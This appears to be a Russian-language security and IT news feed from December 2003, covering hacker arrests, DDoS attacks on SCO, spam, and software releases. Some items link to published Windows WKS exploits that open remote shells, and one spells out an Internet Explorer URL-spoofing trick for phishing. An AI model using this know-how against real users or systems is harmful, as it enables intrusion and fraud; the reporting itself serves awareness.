Как сообщает "Компьюлента", Пользователям, измученным спамом и интернет-червями, не следует думать, что их участь сильно облегчат фильтры и антивирусы. По-видимому, всем пора подготовиться к новой напасти - почтовым "кластерным бомбам". Новую неприятность описали исследователи из Университета штата Индиана в Блумингтоне и компании RSA. Принцип действия "кластерной бомбы" опубликован в декабрьском номере журнала ;login:. "Кластерные бомбы" представляют собой тысячи сообщений, посылаемых в течение короткого промежутка времени на какой-либо почтовый ящик. Отправляют их интернет-серверы, осуществляющие почтовые рассылки и позволяющие подписаться на них посредством заполнения формы на сайте. Злоумышленник может использовать специализированное ПО - скрипты, агентов, червей - для автоматического заполнения форм на тысячах сайтов информацией с почтовым адресом выбранной жертвы. Затем, в силу алгоритма своей работы, серверы, получившие адрес жертвы, начинают отсылать ей письма с просьбой подтвердить полученную информацию. Некоторые сайты практикуют и отправление SMS на сотовый телефон, указанный в поле формы. Неудивительно, что каналы связи адресата всех этих сообщений очень скоро оказываются перегружены. Специалисты считают, что лучшим способом справиться с потенциальной проблемой будет смена идеологии взаимодействия с подписчиком. Возможно, многим держателям интернет-ресурсов придётся модифицировать серверный код с целью предотвращения автоматической отправки писем по указанным адресам. Авторы исследования рекомендуют вообще отказаться от заполнения форм и ввести схему, согласно которой подписчик должен сам высылать на сервер свой почтовый адрес, если желает получать с него рассылку. Подробности - http://newsinfo.iu.edu/news/page/normal/1213.html
16/12/2003 16:17 Хакер уничтожил базу данных рекламного агентства.
Сотрудники полицейской бригады Мадрида по борьбе с преступлениями в сфере высоких технологий задержали жителя Аликанте, подозреваемого в незаконном проникновении в базу данных рекламного агенства Merkley в галисийском городе Виго. В результате хакерской атаки пострадавшее агентство лишилось сведений за последние 8 лет, сообщает сайт Diario Informacion. В ходе допроса задержанный свою причастность к уничтожению архива Merkley отрицал и позже был отпущен под подписку о невыезде. Хакерская атака на базу данных рекламного агентства была совершена в октябре. Полиция пытается установить, можно ли было совершить это преступление с помощью компьютера, не связанного с локальной сетью Merkley. Сотрудники агентства утверждают, что злоумышленник сумел проникнуть в сеть через компьютер генерального менеджера, несмотря на установленное на нем антихакерское программное обеспечение. В Merkley убеждены, что хакер не пытался извлечь из атаки какую-либо экономическую выгоду, а лишь наносил ущерб их предприятию. С учетом того, что резервной копии пропавших данных в агентстве не имеется, ущерб от кибератаки составляет около 60 тысяч евро. Задержанный, возраст которого составляет около 40 лет, утверждает, что никогда не проникал в чужие локальные сети. Источник - http://www.viruslist.ru
15/12/2003 17:48 Бразильцы атакуют русские сайты.
Вчера утром четыре сайта на хостинге компании "Арбатек" были взломаны. Атака оказалась делом известной хакерской группировки из Бразилии - TechTeam. Руководителем всех четырех взломанных сайтов - www.auramedia.ru www.iii.ru, www.2000.ru и www.radisson.ru - является известный сетевой деятель Михаил Вахтеров (один из организаторов ежегодного конкурса "Золотой сайт"). " Сначала я заподозрил, что была атака на весь российский Интернет, но потом сильно удивился тому, что это практически единичный случай", - сообщил он "Internet.ru". На сайте компании "Арбатек" сообщение о взломе отсутствует. По словам г-на Вахтерова, сейчас нормальное функционирование всех ресурсов восстановлено, а хостер заявил, что "данный случай будет проанализирован с особой тщательностью". Две недели назад сайт www.2000.ru уже подвергался взлому, правда, другой командой. Примечателен еще и тот факт, что указанная хакерская группа взломала практически одновременно множество американских сайтов в знак протеста против войны в Ираке. Источник - http://www.internet.ru
15/12/2003 16:20 KNOPPIX 3.3 Russian Edition доступен для скачивания.
Как сообщает linux.org.ru, на Черноголовском сервере (ftp.chg.ru) выложен ISO-образ русской версии KNOPPIX 3.3 от LinuxCenter.Ru. В KNOPPIX 3.3 RE Fall 2003: KDE 3.1.3, OpenOffice 1.0.3, Evolution 1.4.5, KOffice 1.2.1. во всех программах включена поддержка русского языка, внесен ряд доработок и улучшений. В дистрибутив добавлены: Evolution 1.4.5. mplayer 1.0rc2, sim, QuantaPlus, переключатель/индикатор раскладок клавиатуры kkbswitch, aspell для русского языка, кирилические шрифты X11, корректная русификация консоли, русификация для пакета KOffice, Openoffice.org, Mozilla. Проверка орфографии теперь работает и в Abiword. Произведены различные изменения в графическом интерфейсе. Обновлены некоторые библиотеки. Качать - ftp://ftp.chg.ru/pub/Linux/KNOPPIX-RE/
15/12/2003 14:15 Cкрипт для изменения параметров сетевого стека Linux.
Попался довольно интересный и полезный скриптец на Perl, который позволяет динамически изменять параметры сетевого стека ОС Linux. Название скрипта довольно красноречиво - viagra. Автор - некий lewk@csh.rit.edu. Изменения вносятся в файловую систему /proc. Естественно, все эти параметры можно изменять и вручную, однако при помощи этого скрипта их делать намного удобнее и проще. Описание всех изменяемых параметров приводится внутри исходника скрипта. Скрипт - http://packetstorm.linuxsecurity.com/linux/security/viagra.pl
15/12/2003 14:06 Прослушивание сети в коммутируемых сетях.
На сайте packetwatch.net опубликована довольно интересная статья Ryan Spangler, которая описывает различные методы и способы прослушивания траффика в коммутируемых сетях (т.е. сетях, построенных не на концентраторах, а свичах (коммутаторах)). Как известно, в случае использования коммутаторов траффик не гонится широковещанием всем клиентам сетевого сегмента, а соединяет непосредственно (через порты свича) обоих участников сетевого соединения. Подобная коммутация строится на основе таблиц CAM, которые включают в себя: MAC-адреса, номера портов свича и VLAN-информацию. Таким образом прослушивание (сниффинг) в подобных сетях становится довольно нетривиальной задачей. В документе (формата PDF) как раз и рассмотрены методы сниффинга подобных сетей, а также меры защиты. Хотелось бы напомнить, что инструментарий для осуществления прослушивании в коммутируемых сетях существует довольно давно - одним из представителей подобных снифферов является активный сниффер Ettercap. Cтатья - http://www.packetwatch.net/documents/papers/layer2sniffing.pdf
15/12/2003 11:55 Microsoft уберет свастику из своих шрифтов.
Microsoft удалит значки, изображающие свастику, из шрифтов последней версии Microsoft Office, сообщила компания 12 декабря. Кроме того, Microsoft предложит владельцам предыдущих версий специальные программы для удаления этих символов из программ. Свастика включена в шрифт Bookshelf Symbol 7 компании Microsoft. По словам менеджера подразделения Microsoft Office Саймона Маркса, основой для этого шрифта послужил японский набор шрифтов. "Пару недель назад один из наших клиентов обнаружил это", - сказал он, добавив, что компания "не имела никаких оскорбительных намерений". Адольф Гитлер сделал свастику символом нацистской партии, и ее появление в шрифтах Microsoft могло бы быть воспринято как оскорбление евреев. Источник - http://www.cnews.ru
15/12/2003 10:48 Недельный отчет о вирусах.
Опубликован традиционный еженедельный отчёт о вирусной активности прошедшей недели от компании Panda Software. В отчёте представлены описания 2-х червей - Scold.A и Alphx.B, а также троянца Downloader.L. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=221
15/12/2003 10:01 Ликвидирована дыра в Yahoo Mail.
Компания Yahoo сообщила о ликвидации дыры в системе безопасности своего бесплатного сервиса электронной почты. Дыра оставляла возможность хакерам распространять по электронной почте вирусы, запускающиеся при открытии послания, создавая опасность утечки конфиденциальной информации, считают специалисты фирмы Finjan Software, обнаружившие дыру. По словам представителя Yahoo, об уязвимости стало известно 11 ноября, после чего негласно были предприняты незамедлительные действия по устранению дыры в сервисе компании, чтобы не доставлять пользователям лишних хлопот. "Yahoo очень серьезно относится к вопросам безопасности и принимает тщательные и радикальные меры для защиты своих пользователей, - заявила пресс-атташе компании Мэри Осако. - К счастью, нам не известен ни один случай, в котором кто-либо из наших клиентов пострадал от этого недостатка в сервисе Yahoo Mail". В отличие от конкурирующей службы Microsoft Hotmail, у Yahoo Mail довольно редко возникают проблемы с безопасностью. Подробности - http://www.reuters.com/newsArticle.jhtml?type=topNews&storyID=3962387
14/12/2003 19:04 XSS-уязвимость в форуме ixbt.com.
Как сообщает bugtraq.ru, cтало известно, что при выводе информации об участниках популярного форума forum.ixbt.com отсутствует фильтрация тегов, что дает возможность потенциальному атакующему получить доступ к cookie жертвы и, видимо, возможность захвата аккаунта при удачном стечении обстоятельств. Не очень страшно, но неприятно. Администрация форума поставлена в известность. Подробности - http://www.web-hack.ru/
14/12/2003 18:05 NTT оказывается от применения операционной системы от Microsoft..
Один из крупнейших производителей сотовых телефонов, японская корпорация NTT DoCoMo, исключает операционную систему от Microsoft из своей стратегии по развитию сотовой телефонии нового поколения (3G). Компания имеет серьезное влияние на японский рынок и то, что она будет использовать операционные системы Symbian и Linux может резко увеличить долю последних. Кежи Тачикава (Keiji Tachikawa), президент DoCoMo, заявил, что основной задачей остается снижение стоимости конечного продукта, поэтому не имеет смысла поддерживать несколько операционных систем. Компания, являясь также оператором сотовой связи, рекомендует для применения в своей сети, в том числе и базирующиеся на Symbian OS телефоны Fujitsu и имеет некоторый опыт работы с этой системой. Кроме того, корпорация планирует разрабатывать собственную версию Linux для мобильных устройств. Источник - http://www.mobile-review.com
14/12/2003 17:47 EBay требует запретить хакеру пользоваться Интернетом.
Интернет-аукцион eBay обвиняет Джерома Хекенкампа в хакерских действиях в федеральном суде Калифорнии. Три года назад хакер уже имел дело с правосудием и в результате слушания частью его приговора было запрещение пользоваться компьютером в течение трех лет. По условиям, назначенным судьей, 24 летний хакер может использовать только один единственный компьютер, установленный у него дома - без модема и какого бы то ни было доступа в Сеть. Такое постановления суда, запрещающие пользование Интернетом, одно время обрело популярность, но в свете того что всемирная Сеть все теснее входит в жизнь, нередко подвергается яростным нападкам правозащитников. Адвокат Джерома Хекенкампа сейчас активно акцентирует внимание на нарушение таким ограничением Прав Человека и надеется добиться отмены постановления суда. Хекенкамп обвинен во взломе сервера изготовителя телекоммуникационного оборудования Qualcomm. Ранее он уже привлекался по обвинению в незаконном проникновении в компьютеры Lycos, Exodus Communications, Juniper Networks, Cygnus Support Solutions. Сам Хекенкамп активно отрицает свою вину, утверждая, что взломщик дистанционно использовал его компьютер без ведома владельца. Источник - http://www.crime-research.ru
14/12/2003 17:22 Патчи для запуска 2.6 Linux ядра на системах с минимальным объемом ОЗУ.
По сообщению opennet.ru, Matt Mackall опубликовал набор патчей для 2.6 Linux ядра минимизирующий требования к объему памяти и позволяющий запустить 2.6 ядро на системе с 4 Мб ОЗУ (!). Подробности - http://kerneltrap.org/node/view/1769
14/12/2003 16:36 Frenzy - Live CD на базе FreeBSD.
На сайте linuxcenter.ru представлен так называемый LiveCD дистрибутив ОС FreeBSD под названием Frenzy. Frenzy - это "портативный инструмент системного администратора", LiveCD на базе ОС FreeBSD, загрузившись с которого, администратор получает полностью работоспособную систему с набором программного обеспечения для настройки, проверки и анализа сети, тестирования компьютерного "железа" и ряда других задач. Выпускается и поддерживается командой разработчиков из Украины (вспомним о запорожском LiveCD Linux под названием Blin Linux - хочется порадоваться за украинских коллег). Кстати, координатор проекта - Можайский Сергей Витальевич из Мелитополя, что расположен в Запорожской области. ;) Базой для Frenzy является операционная система FreeBSD 4.8-STABLE. Дистрибутив можно заказать, как через Интернет в linuxcenter.ru, так и скачав ISO-образ с сайта команды. Подробности - http://frenzy.org.ua/rus/download.shtml
14/12/2003 16:18 Вышел новый сервер приложений Oracle.
Oracle объявила о выпуске сервера приложений Oracle Application Server 10g. Основной особенностью новой версии является поддержка модели grid-вычислений, которой Oracle предлагает воспользоваться в качестве средства сокращения расходов. По словам представителя компании, Application Server 10g обеспечивает возможность упрощенного развертывания, клонирования, снабжения ресурсами и контроля большого количества копий программного продукта, работающих в grid-среде. Предусмотрены также функции, облегчающие интеграцию приложений предприятия, управление бизнес-процессами и мониторинг производительности индивидуальных приложений. Сервер выпущен в трех вариантах: Java Edition (для разработчиков), Standard Edition ("облегченная" редакция с модулями бизнес-интеллекта и построения порталов), Enterprise Edition (наиболее полный вариант). Пока продукт вышел в версиях для Unix и Linux, вскоре планируется и Windows-вариант. До конца года выйдут также "10g-версии" СУБД Oracle и инструментария управления системами Enterprise Manager, в котором тоже появится поддержка grid-сред. На январь запланирован выпуск интегрированной среды разработки JDeveloper 10g. Источник - http://www.osp.ru
13/12/2003 18:15 Microsoft снова вернула сервера под управление родной ОС?
По сообщениям TheRegister, согласно крайнему обзору Netcraft, 26 ноября M$ снова вернулась на сервер под управлением "родной" и "горячо любимой" ОС. Ранее сервер был переведён на Linux-сервер компании Akamai после серии продолжительных DDoS-атак в августе этого года (в том числе после ударов со стороны червя MSBlast). По видимому, корпорация посчитала, что угроза серверу под управлением ОС Win* миновала. Ну что же - время покажет. ;) Подробности - http://www.theregister.co.uk/content/28/34448.html
13/12/2003 18:03 Выход FreeBSD 5.2-RC1.
Как сообщает nixp.ru, Scott Long из команды разработчиков FreeBSD опубликовал ISO-файлы FreeBSD 5.2-RC1. Уже доступны версии операционной системы для архитектур i386, alpha, и pc98, поддержка amd64 ожидается в ближайшее время. Разработчики призывают к активному тестированию этого кандидата в релизы, а сам 5.2-RELEASE обещают уже на следующей неделе. Образы - ftp://ftp.freebsd.org/pub/FreeBSD/ISO-IMAGES-i386/5.2/
13/12/2003 17:44 Обзор Red Hat Enterprise Linux Advanced Server 3.0
На сайте osnews.com опубликован обзор коммерческой ОС, выпускаемой известной компанией RedHat под названием Red Hat Enterprise Linux Advanced Server, или, сокращённо - RHELAS, версии 3.0. Обзор составлен Andy Richter - старшекурсником (Senior) университета в Сиракузах, специализирующимся на информационном менеджменте и технологиях. Помимо РедХата автор также близко знаком с ОС: Solaris 2.6-8, FreeBSD, OpenBSD. Обзор - http://www.osnews.com/story.php?news_id=5371
13/12/2003 17:29 Впервые арестован спамер.
В американском штате Вирджиния с момента вступления в действие антиспамерского закона прошло несколько месяцев и вот, наконец, долгожданный результат - проведены первые в истории аресты за рассылку спама. Власти штата впервые применили закон против спамеров, принятый 1 июля 2003 года. Полиция арестовала двоих жителей штата, которые по оценкам сайта spamhaus.org являются одними из самых известных спамеров в США. Один из арестованных, Гэвен Стабберфилд, в рейтинге, опубликованном на сайте, занимает восьмое место. Прокурор штата Джерри Килгора, заявил, что арестованные рассылали электронные сообщения с фальшивых адресов, используя вымышленные имена и предоставляли ложную информацию о пути следования писем. Объемы рекламных рассылок позволили прокуратуре расценивать действия спамеров, как уголовное преступление. Источник - http://www.securitylab.ru
13/12/2003 17:04 Microsoft запатентовала «HTML-приложения».
Во вторник Палата патентов и торговых марок США выдала Microsoft патент на способ написания Windows-приложений в HTML, который позволяет обходить встроенную защиту браузера. Согласно заявке, патент (no. 6,662,341) относится к написанию стандартного файла HTML, который работает в собственном окне отдельно от браузера. Это означает, что автор HTML-приложения может не думать о защитных мерах, предусмотренных в браузере, что позволяет ему читать данные из компьютера пользователя, записывать данные в локальный компьютер и выполнять скрипты фреймов между доменами. Патент открывает дорогу так называемым HTML-приложениям — файлам нового типа, которые Windows будет интерпретировать как самостоятельные программы, способные работать вне браузера. «Большинство существующих систем разработки Windows-приложений требует знания специальных языков программирования, таких как C++ или Visual Basic, — говорится в патенте. — Для людей без технической подготовки изучение языка программирования часто бывает затруднительно. Однако многие из них умеют пользоваться HTML и языками сценариев, такими как VBScript и Jscript (реализация JavaScript от Microsoft)». Подробности - http://news.zdnet.co.uk/software/developer/0,39020387,39118430,00.htm
13/12/2003 16:36 Россия продолжает сроить собственную GPS.
Три космических аппарата серии "Космос", запущенные вечером 10 декабря с Байконура на ракете-носителе "Протон", в расчетное время выведены на целевую орбиту. Об этом РИА "Новости" сообщили со ссылкой на представителя пресс-службы Космических войск РФ. Спутники российской системы ГЛОНАСС предназначены для определения точного местонахождения судов, самолетов, и спецавтотехники. Для определения пространственных координат и времени требуется прием сигналов с четырех спутников одновременно. С помощью ГЛОНАСС-приемников возможно определение трех координат местоположения потребителя, скорости его движения в привязке ко времени по высокоточной шкале координированного всемирного времени. Как рассказал агентству представитель Космических войск, аппараты излучают сигналы двух типов: навигационный сигнал стандартной точности (частота 1,6 ГГц) и высокоточный сигнал в диапазоне 1,2 ГГц. Обычные потребители ГЛОНАСС смогут получать только первый сигнал, позволяющий определить горизонтальные координаты объекта с точностью 50 метров и вертикальные - с точностью до 70 метров. Кроме того, система также может определить вектор скорости с точностью до 15 сантиметров в секунду и время с точностью 0,7 микросекунд. Источник - http://rian.ru/
13/12/2003 16:15 Атака на серверы SCO продолжается.
Cудя по всему, необоснованные (с точки зрения многих производителей *NIX-дистрибутивов) требования SCO по соблюдению авторских прав на якобы запатентованную SCO OC UNIX на ходят горячую поддержку в глазах "активистов" компьютерного андэграунда. Результатом этого стали продолжительные DoS - атаки на различные сервера принадлежащие корпорации (размещается в г. Линдон, штат Юта, США). Вчера, вслед за атакой на Вэб-сервер (мы сообщали об этом ранее), атаке подверглись почтовый и файловый сервера, о чём сообщил главный СИСАДМИН компании. Это сообщение также подтвердил Jeff Carlon, директор по информационным технологиям SCO. Подробности - http://www.linux.org/news/2003/12/12/0001.html
12/12/2003 21:20 Новый документ: Молодые специалисты.
Статья для молодых специалистов в сфере ИТ. Советы для искателей вакансий в крупных фирмах и в фирмах, работающих на запад. Ряд советов, как нужно вести себя и что нужно знать для успешного поступления на работу. Ознакомиться: http://www.uinc.ru/articles/44/
12/12/2003 16:10 DoS против Macromedia ColdFusion MX.
Уязвимость обнаружена в Macromedia's ColdFusion MX. Удаленный пользователь может представить специально обработанный XML SOAP запрос, чтобы заставить сервер использовать 100% ресурсов CPU. Если SOAP запрос включает специально обработанные XML атрибуты, то целевой XML парсер будет использовать 100% ресурсов CPU в течении продолжительного периода времени (от нескольких секунд до минут). В качестве защиты предлагается обновить версию ColdFusion при помощи патча опубликованного на сайте производителя (Macromedia) - MPSB03-07. Подробности - http://www.securitylab.ru/41675.html
12/12/2003 14:18 Новая ИТ-система ФБР требует еще денег и времени.
ФБР испытывает серьезные сложности с обновлением своей компьютерной системы – введение ее в эксплуатацию откладывается на определенное время, а издержки превысили запланированный уровень. Усовершенствованная система должна позволить агентам ФБР по всему миру более эффективно обмениваться агентурными данными и получать доступ к следственным архивам. Важный компонент системы, известный под кодовым названием Virtual Case File, первоначально планировалось ввести в эксплуатацию уже к 13 декабря. Он позволит агентам получить доступ к новой базе данных, где содержатся свыше 40 млн. электронных документов по вопросам терроризма. Но теперь, по словам представителей ФБР, агентам придется подождать еще несколько месяцев. Кроме того, как сообщили 10 декабря официальные лица ФБР, стоимость всей системы, известной под кодовым названием Trilogy, может превысить $626 млн., что гораздо выше первоначально планируемых $380 млн. Две основные части новой системы уже введены в эксплуатацию, включая 22 тыс. новых ПК, установленных в отделениях ФБР на местах, и создание защищенной сети, соединяющей их воедино. В ФБР также была увеличена пропускная способность внутренних сетей, так что теперь агенты могут обмениваться большими объемами данных, в том числе и фотографиями. Однако еще в прошлом месяце правительственная Администрация общих служб (GSA), отвечающая за госзакупки, сообщила о том, что компания Computer Sciences, которая разрабатывает компонент Virtual Case File, не сможет уложиться в назначенный срок до 13 декабря. Сейчас определяется новый график ввода компонента в эксплуатацию, и после того, как он будет установлен, агенты смогут использовать новую базу данных уже через 4-6 недель. Источник - http://www.cnews.ru
12/12/2003 14:09 Intel выпустила новую версию компиляторов.
Как сообщает cnews.ru, комрпорация Intel представила версию 8.0 компиляторов для создания приложений, работающих на серверах, настольных ПК и мобильных системах, таких как ноутбуки, мобильные телефоны и карманные компьютеры на базе процессоров Intel. Компиляторы созданы при активном участии сотрудников нижегородского Центра Intel по разработке ПО и специалистов Intel из Сарова. Новая серия включает компиляторы Intel для языков C++ и Fortran для ОС Windows и Linux, а также компиляторы Intel для языка C++ для ОС Windows CE .NET. Компиляторы ориентированы на системы на базе следующих процессоров Intel: Intel Itanium 2, Intel Xeon, Intel Pentium 4, процессоров с архитектурой Intel Personal Internet Client Architecture для мобильных телефонов и карманных ПК и процессора Intel Pentium M для мобильных ПК (компонент технологии Intel Centrino для мобильных ПК). В компиляторе Intel Visual Fortran для ОС Windows реализованы технологии компиляции нового поколения для высокопроизводительных вычислительных решений. Он соединяет в себе функциональность языка Compaq Visual Fortran (CVF) и повышение производительности, ставшее возможным благодаря технологиям оптимизации компиляции и генерации кода корпорации Intel, и упрощает задачу переноса исходного кода, разработанного с помощью CVF, в среду Intel Visual Fortran. В этом компиляторе функции CVF впервые реализованы как для 32-разрядных систем Intel, так и для систем на базе процессоров семейства Intel Itanium, работающих в среде Windows. Кроме того, этот компилятор позволяет реализовать языковые функции CVF в системах под управлением ОС Linux на базе 32-разрядных процессоров Intel и процессоров семейства Intel Itanium. В начале 2004 года планируется выпустить расширенную версию этого компилятора – компилятор Intel Visual Fortran Compiler Professional Edition для ОС Windows, в состав которой будет включена библиотека IMSL Fortran 5.0 Library, разработанная компанией Visual Numerics, Inc. Среди новых инструментов, включенных в компиляторы – средства Intel Code Coverage и Intel Test Prioritization. Code Coverage в ходе тестирования приложения предоставляет полные сведения об использовании логики приложения и о расположении используемых участков в исходном коде приложения. В случае, если в приложение вносятся изменения или если данный тест не позволяет проверить часть приложения, интересующую разработчика, средство Test Prioritization позволяет проверить работу выбранного участка программного кода. Подробности - http://www.intel.ru
12/12/2003 13:56 Спамеры ежегодно лишают Сингапур 50 миллионов долларов.
Ущерб, наносимый спамом экономике Сингапура, составляет 50 млн сингапурских долларов ((24 млн евро)в год. К таким результатам пришли специалисты сингапурской Федерации информационных технологий, сообщает агентство EFE. Оценки сингапурских аналитиков подтверждают и исследователи из компании Symantec, занимающейся производством антивирусного программного обеспечения. Согласно отчетам Symantec, для очистки почтовых ящиков от нежелательной электронной корреспонденции пользователи в среднем ежедневно тратят от 10 до 40 минут. Получателями спама в Сингапуре являются приблизительно 80% всех пользователей. Подробности - http://www.el-mundo.es/navegante/2003/12/10/esociedad/1071061345.html
12/12/2003 13:24 Распределенная DoS-атака по телефону.
Технология распределенной DoS-атаки (denial of service), когда огромное количество одновременных запросов перегружают сервер, недавно была применена против английской полиции. В качестве программ-троянов, устанавливающихся на компьютерах других пользователей и посылающих с них запросы, невольно выступили местные жители. Прикрытием для акции был выбран популярный MP3-плеер Apple iPod. Некий хулиган организовал массовую рассылку писем, в которых сообщалось, что с кредитной карточки получателя по ошибке было списано 399,99 фунта стерлингов за покупку МР3-плеера iPod. Чтобы уладить ситуацию, ему предлагалось позвонить по прилагавшемуся номеру телефона. Но это был номер не указанной в письме компании UK Cards Limited, а центральное полицейское управление Кембриджшира. Разумеется, позднее выяснилось, что компания с таким названием на самом деле и не существовала. Через несколько дней королевская полиция задержала двадцатиоднолетнего подозреваемого, который затем был из-под стражи отпущен под залог. Источник - http://www.compulenta.ru
12/12/2003 13:07 Исправленный эксплоит уязвимости в Windows.
На нижегородском сайте ЗАРАЗы опубликован эксплоит уязвимости в Windows, описанной в бюллетене MS03-049 (переполнение буфера в библиотеке wkksvc.dll). Автор (Firestorm) исправил ранее опубликованный эксплоит в плане поддержки русского языка в шелле. Сам шелл теперь вешается на порт 4444. Работа тестировалась в версиях winxpSP0ru,winxpSP1ru. Платформа - по прежнему win32. Эксплоит - http://www.security.nnov.ru/files/ntctl-03-49.c
12/12/2003 12:43 В Киеве задержан хакер, "потрошивший" банкоматы.
Сотрудники столичного управления по борьбе с экономическими преступлениями совместно со Службой безопасности Украины задержали хакера, "взламывавшего" банкоматы одного из известных киевских банков, передают Українські Новини. Об этом сообщили в четверг, 11 декабря, в пресс-службе Главного управления Министерства внутренних дел Украины в Киеве. По данным правоохранителей, хакер завладевал номерами банковских платежных карт, фамилиями и PIN-кодами клиентов банка, после чего с помощью офисного оборудования изготавливал дубликаты платежных карт, наносил на них магнитную полосу, кодировал ее и снимал с чужих счетов деньги. Следствие уже доказало 4 факта совершенных им краж денег из банкоматов на общую сумму 54 тысячи гривен. Киевским следственным управлением возбуждены уголовные дела по части 5 статьи 185 Уголовного кодекса (кража) и части 2 статьи 362 УК (кража, присвоение, вымогательство компьютерной информации или завладение ею путем мошенничества или злоупотребления служебным положением). Вместе с тем, милиция подозревает, что хакер успел ограбить клиентов банка на сумму не менее 300 тысяч гривен. Следствие продолжается. Задержанный хакер работал программистом в одной из столичных компаний и по своим функциональным обязанностям имел доступ к банкоматам. Все преступления были совершены им в период с июля по ноябрь текущего года. Источник - http://www.crime-research.ru/
11/12/2003 20:29 Разработчики обеспокоены безопасностью open-source.
Как сообщает nixp.ru, Множество недавних online-атак на серверы с open-source программным обеспечением заставило разработчиков задуматься. В течение последних четырех месяцев неизвестным удалось обойти защиту серверов с программами и публикациями кода Linux-ядра, проектов Debian, Gentoo Linux и GNU. Атаки заставили лидеров open-source проектов посмотреть на свою безопасность с другой стороны. «Факт того, что целями стали open-source серверы и главные серверы open-source разработок, несомненно, удивителен, — заявил Corey Shields, участник проекта Gentoo Linux. — Беспокоит то, что, если бы кто-то захотел показать свою злонамеренность, то он мог бы изменить код ПО, и пользователям бы достались модифицированные пакеты.» Однако, например, Linus Torvalds, утверждает, что исходный код Linux-ядра постоянно (и повсеместно) копируется, так что все «сомнительные» добавки в нем всегда будут найдены (в случае их появления). Источник - nixp.ru
11/12/2003 19:25 SCO Group подверглась третьей DDoS-атаке.
Производящая программное обеспечение для бизнес-решений компания SCO Group 10 декабря подверглась DDoS-атаке. Произошедший инцидент стал уже третьим в практике SCO Group в этом году. Организаторами атаки, возможно, являются хакеры, недовольные правовыми угрозами компании в адрес пользователей операционной системы Unix, сообщает Associated Press. DDoS-атака против SCO началась 10 декабря в 14:20 по московскому времени и продолжалась в течение дня. Участники кибернападения сумели привлечь для достижения своей цели несколько тысяч компьютеров. На начальном этапе хакерам удалось парализовать работу не только веб-сайта компании, но и ее внутреннюю сеть и среди прочего приостановить работы по клиентской поддержке. Во второй половине дня работу всех систем за исключением веб-сервера удалось восстановить. Предыдущие DDoS-атаки против SCO происходили в марте и июне и длились по 24 часа. Представитель компании сообщил об обращении в правоохранительные органы с целью розыска нападавших и установления возможной связи последнего инцидента с двумя прежними. Источник - http://www.viruslist.ru
11/12/2003 18:21 Microsoft и Universal Music будут зарабатывать с помощью файлообменных сетей.
Файлообменные сети из пристанища для пиратов будут преобразованы в легальное выгодное предприятие. С таким заявлением 10 декабря при поддержке широкого альянса союзников выступили Microsoft и один из ведущих звукозаписывающих лейблов Universal Music, сообщает Reuters. Представители Microsoft и Universal Music уже представили технические спецификации системы, пользователи которой будут обмениваться специальными "содержательными ссылками" вместо прямого перекачивания музыкальных файлов друг у друга. "Содержательные ссылки" смогут функционировать в существующих ныне файлообменных сетях, используемых преимущественно для незаконного копирования песен и других музыкальных произведений. Новая система позволит пользователям подбирать необходимые файлы в удобном формате. К примеру, если пользователю понадобится песня в формате MP3, система сама преобразует ее из любого другого формата. Цены на содержимое сети будут изменяться динамически в зависимости от популярности конкретных файлов или их типа. Источник - http://www.lenta.ru
10/12/2003 21:02 Ещё один эксплоит уязвимости сервиса WKS WinXP.
Опубликован ещё один эксплоит уязвимости сервиса WKS в ОС WinXP Pro + SP1. Написан нашим соотечественником под ником fiNis. После проведения атаки открывает шелл на порту 9191. Написан на Си для win-платформы. Эксплоит - http://packetstorm.linuxsecurity.com/0312-exploits/rpc_wks_bo.c
10/12/2003 20:29 Министерство национальной безопасности США оказалось самым уязвимым.
В 2003 году правительственные структуры США, в основном, сумели повысить уровень безопасности своих компьютерных сетей, однако ряд ведущих ведомств, в числе которых Министерство национальной безопасности, по-прежнему остаются уязвимыми для киберпреступников, сообщает CNET News. Согласно специально созданной буквенной шкале оценки степени защищенности компьютерных сетей, ведомство Томаса Риджа (Thomas Ridge) получило букву «F», что соответствует самому низкому уровню готовности противостоять киберугрозе. Аналогичным образом оценивалась защита сетей всех правительственных ведомств США в прошлом году. По итогам последних исследований, основная масса министерств и управлений смогла усовершенствовать свою работу и вышла на уровень защиты «D». Наиболее высокой оценки «A» удостоились Комиссия по ядерному надзору (NRC) и Национальный научный фонд. В связи с этим стоит отметить, что контролируемый NRC ядерный реактор в январе этого года оказался уязвим для атаки червя Slammer. Полностью результаты оценки безопасности правительственных сетей приведены на сайте Комитета по реформированию правительства. Подробности - http://www.silicon.com/management/government/0,39024677,39117281,00.htm
10/12/2003 20:06 Баг в IE помогает похищать данные.
Как сообщил Zap The Dingbat, ошибка в Internet Explorer облегчает создание фальшивых сайтов, которые выглядят как подлинные и крадут информацию у пользователей а также помогает злоумышленникам обманывать пользователей интернета, выуживая у них конфиденциальную информацию и заставляя исполнять вредоносные программы. Составив URL особым образом, в браузер можно поместить окно, отображающее любой выбранный атакующим адрес: это позволяет мошеннику создать впечатление, что отображается один сайт на самом же деле загружается контент из другого источника. Этим способом жертву легко ввести в заблуждение с целью выведать персональные данные, например, прислать письмо от имени интернет-банка или другого подобного сайта с просьбой изменить пароль. «Вы можете представиться кем угодно и заставить кого угодно исполнить нужную вам программу, — пояснил инженер по компьютерной безопасности Дрю Коупли. — Конечно, это не конец света, но забот у Microsoft прибавится». Сформировав URL вида http://user@domain, и включив 0x01 после знака "@" можно скруть вторую часть URL. Уязвимости подвержены версии IE до 6.0.2800.1106C0 включительно с патчами: SP1, Q810847, Q810351, Q822925, Q330994, Q828750, Q824145. Также. судя по обсуждению, уязвимости подвержена версия IE для Mac, а также (по одному сообщзению) браузер Firebird 0.7 (как ни странно). Господин с ником http-equiv из malware.com также приготоваил свою версию демонстрации эксплоита. Описание - http://www.zapthedingbat.com/security/ex01/vun1.htm Демка - http://www.malware.com/hole-e-day.zip
10/12/2003 19:44 КГБ Белоруссии хочет контролировать интернет.
